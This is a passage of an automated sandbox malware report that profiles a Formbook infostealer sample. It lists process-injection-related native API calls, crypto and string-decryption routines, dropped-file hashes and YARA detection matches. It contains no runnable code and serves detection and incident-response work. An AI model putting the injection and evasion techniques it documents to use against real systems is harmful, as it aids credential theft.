Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00830048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00830048
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00830078 NtResumeThread,LdrInitializeThunk,	5_2_00830078
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082F9F0 NtClose,LdrInitializeThunk,	5_2_0082F9F0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082F900 NtReadFile,LdrInitializeThunk,	5_2_0082F900
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_0082FAD0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_0082FAE8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_0082FBB8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_0082FB68
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_0082FC90
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_0082FC60
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FD8C NtDelayExecution,LdrInitializeThunk,	5_2_0082FD8C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_0082FDC0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_0082FEA0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_0082FED0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FFB4 NtCreateSection,LdrInitializeThunk,	5_2_0082FFB4
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008310D0 NtOpenProcessToken,	5_2_008310D0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00830060 NtQuerySection,	5_2_00830060
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008301D4 NtSetValueKey,	5_2_008301D4
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083010C NtOpenDirectoryObject,	5_2_0083010C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00831148 NtOpenThread,	5_2_00831148
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008307AC NtCreateMutant,	5_2_008307AC
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082F8CC NtWaitForSingleObject,	5_2_0082F8CC
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00831930 NtSetContextThread,	5_2_00831930
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082F938 NtWriteFile,	5_2_0082F938
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FAB8 NtQueryValueKey,	5_2_0082FAB8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FA20 NtQueryInformationFile,	5_2_0082FA20
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FA50 NtEnumerateValueKey,	5_2_0082FA50
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FBE8 NtQueryVirtualMemory,	5_2_0082FBE8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FB50 NtCreateKey,	5_2_0082FB50
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FC30 NtOpenProcess,	5_2_0082FC30
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00830C40 NtGetContextThread,	5_2_00830C40
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FC48 NtSetInformationFile,	5_2_0082FC48
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00831D80 NtSuspendThread,	5_2_00831D80
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FD5C NtEnumerateKey,	5_2_0082FD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A900C4 NtCreateFile,LdrInitializeThunk,	7_2_00A900C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A907AC NtCreateMutant,LdrInitializeThunk,	7_2_00A907AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8F9F0 NtClose,LdrInitializeThunk,	7_2_00A8F9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8F900 NtReadFile,LdrInitializeThunk,	7_2_00A8F900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FAB8 NtQueryValueKey,LdrInitializeThunk,	7_2_00A8FAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_00A8FAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_00A8FAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_00A8FBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_00A8FB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FB50 NtCreateKey,LdrInitializeThunk,	7_2_00A8FB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_00A8FC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FD8C NtDelayExecution,LdrInitializeThunk,	7_2_00A8FD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_00A8FDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_00A8FED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FFB4 NtCreateSection,LdrInitializeThunk,	7_2_00A8FFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A910D0 NtOpenProcessToken,	7_2_00A910D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A90060 NtQuerySection,	7_2_00A90060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A90078 NtResumeThread,	7_2_00A90078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A90048 NtProtectVirtualMemory,	7_2_00A90048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A901D4 NtSetValueKey,	7_2_00A901D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9010C NtOpenDirectoryObject,	7_2_00A9010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A91148 NtOpenThread,	7_2_00A91148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8F8CC NtWaitForSingleObject,	7_2_00A8F8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8F938 NtWriteFile,	7_2_00A8F938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A91930 NtSetContextThread,	7_2_00A91930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FA20 NtQueryInformationFile,	7_2_00A8FA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FA50 NtEnumerateValueKey,	7_2_00A8FA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FBE8 NtQueryVirtualMemory,	7_2_00A8FBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FC90 NtUnmapViewOfSection,	7_2_00A8FC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FC30 NtOpenProcess,	7_2_00A8FC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FC48 NtSetInformationFile,	7_2_00A8FC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A90C40 NtGetContextThread,	7_2_00A90C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A91D80 NtSuspendThread,	7_2_00A91D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FD5C NtEnumerateKey,	7_2_00A8FD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FEA0 NtReadVirtualMemory,	7_2_00A8FEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FE24 NtWriteVirtualMemory,	7_2_00A8FE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FFFC NtCreateProcessEx,	7_2_00A8FFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FF34 NtQueueApcThread,	7_2_00A8FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099D60 NtCreateFile,	7_2_00099D60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099E10 NtReadFile,	7_2_00099E10
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099E90 NtClose,	7_2_00099E90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099F40 NtAllocateVirtualMemory,	7_2_00099F40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099E0A NtReadFile,	7_2_00099E0A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099E8A NtClose,	7_2_00099E8A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00099F3F NtAllocateVirtualMemory,	7_2_00099F3F

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Roaming\propser16364.exe

Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_00403461

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_00406925	4_2_00406925
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041E814	5_2_0041E814
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0041D0A2	5_2_0041D0A2
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00409E40	5_2_00409E40
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00409E3B	5_2_00409E3B
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083E0C6	5_2_0083E0C6
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0086D005	5_2_0086D005
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00843040	5_2_00843040
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0085905A	5_2_0085905A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083E2E9	5_2_0083E2E9
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008E1238	5_2_008E1238
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083F3CF	5_2_0083F3CF
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008663DB	5_2_008663DB
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00842305	5_2_00842305
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00847353	5_2_00847353
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0088A37B	5_2_0088A37B
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00875485	5_2_00875485
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00851489	5_2_00851489
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0087D47D	5_2_0087D47D
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0085C5F0	5_2_0085C5F0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084351F	5_2_0084351F
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00844680	5_2_00844680
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084E6C1	5_2_0084E6C1
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008E2622	5_2_008E2622
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008C579A	5_2_008C579A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084C7BC	5_2_0084C7BC
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008757C3	5_2_008757C3
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008DF8EE	5_2_008DF8EE
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084C85C	5_2_0084C85C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0086286D	5_2_0086286D
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008E098E	5_2_008E098E
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008429B2	5_2_008429B2
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008569FE	5_2_008569FE
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008C5955	5_2_008C5955
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008F3A83	5_2_008F3A83
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008ECBA4	5_2_008ECBA4
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083FBD7	5_2_0083FBD7
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008CDBDA	5_2_008CDBDA
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00867B00	5_2_00867B00
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008DFDDD	5_2_008DFDDD
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00870D3B	5_2_00870D3B
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0084CD5B	5_2_0084CD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9E0C6	7_2_00A9E0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ACD005	7_2_00ACD005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA3040	7_2_00AA3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AB905A	7_2_00AB905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9E2E9	7_2_00A9E2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B41238	7_2_00B41238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9F3CF	7_2_00A9F3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AC63DB	7_2_00AC63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA2305	7_2_00AA2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AEA37B	7_2_00AEA37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA7353	7_2_00AA7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AB1489	7_2_00AB1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AD5485	7_2_00AD5485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ADD47D	7_2_00ADD47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ABC5F0	7_2_00ABC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA351F	7_2_00AA351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA4680	7_2_00AA4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AAE6C1	7_2_00AAE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B42622	7_2_00B42622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AAC7BC	7_2_00AAC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B2579A	7_2_00B2579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AD57C3	7_2_00AD57C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B3F8EE	7_2_00B3F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AC286D	7_2_00AC286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AAC85C	7_2_00AAC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AA29B2	7_2_00AA29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B4098E	7_2_00B4098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AB69FE	7_2_00AB69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B25955	7_2_00B25955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B53A83	7_2_00B53A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B4CBA4	7_2_00B4CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B2DBDA	7_2_00B2DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9FBD7	7_2_00A9FBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AC7B00	7_2_00AC7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00B3FDDD	7_2_00B3FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AD0D3B	7_2_00AD0D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AACD5B	7_2_00AACD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AD2E2F	7_2_00AD2E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ABEE4C	7_2_00ABEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00AB0F3F	7_2_00AB0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00ACDF7C	7_2_00ACDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009D0A2	7_2_0009D0A2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_0009E814	7_2_0009E814
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00089E3B	7_2_00089E3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00089E40	7_2_00089E40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00082FB0	7_2_00082FB0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe 7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll 974E158EA37951D137839D4189279330AA2E85F5BAFA4F273F7007673CD4D3FC
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\propser16364.exe 7C6393B4E86EA5CEC49C0F814B17E4BB85AA447C19896037252A94FF6416CE1B

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 0083E2A8 appears 37 times
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 0083DF5C appears 106 times
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 00883F92 appears 104 times
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 008AF970 appears 79 times
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: String function: 0088373B appears 214 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00B0F970 appears 81 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00A9DF5C appears 112 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00AE3F92 appears 108 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00AE373B appears 238 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: String function: 00A9E2A8 appears 38 times

Yara signature match

Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
